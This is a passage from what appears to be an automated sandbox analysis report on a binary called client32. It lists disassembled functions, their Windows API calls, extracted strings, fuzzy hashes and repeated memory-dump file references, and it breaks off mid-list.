                                                                                                                                                    • API String ID: 602542589-0
                                                                                                                                                    • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                                                                                    • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                                                                                    • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                                                                                    • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                                                                                    Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                                                                                      • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F1590,?,110CD955,00000000,76963760), ref: 111103E8
                                                                                                                                                      • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD955,00000000,76963760), ref: 11110408
                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                                                                                    • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                                                    • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                                                                                    • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1497311044-0
                                                                                                                                                    • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                                                                                    • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                                                                                    • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                                                                                    • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                                                                                    Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                                                                                                    • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 11113615
                                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 11113620
                                                                                                                                                    • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                                                                                                    • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1094208222-0
                                                                                                                                                    • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                                    • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                                                                                    • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                                                                                    • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                                                                                    Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                    • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                    • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                                                                                    • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                                                                                    • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                                                                                    Function 1109D980 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                                                                                                    • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                                                                                                    • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$Event$FileUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2427653990-0
                                                                                                                                                    • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                                                                                    • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                                                                                                    • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                                                                                    • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                                                                                                    Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • _memset.LIBCMT ref: 110433A9
                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MetricsSystem$__wcstoi64_memset
                                                                                                                                                    • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                                                                                    • API String ID: 3760389471-710950153
                                                                                                                                                    • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                                                                                    • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                                                                                    • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                                                                                    • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                                                                                    Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                                                                                    • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                                                                                    • GetTextColor.GDI32(?), ref: 1101F645
                                                                                                                                                      • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                                                                                      • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                                                                                      • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                                                                                      • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                                                                                      • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                                                                                      • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                                                                                      • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                                                                                    • String ID: VUUU$VUUU
                                                                                                                                                    • API String ID: 179481525-3149182767
                                                                                                                                                    • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                                                                                    • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                                                                                    • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                                                                                    • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                                                                                    Function 1103B420 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$FolderPathSystemWindows
                                                                                                                                                    • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                                                                                                    • API String ID: 1538031420-1992112792
                                                                                                                                                    • Opcode ID: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                                                                                                    • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                                                                                                    • Opcode Fuzzy Hash: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                                                                                                    • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                                                                                                    Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
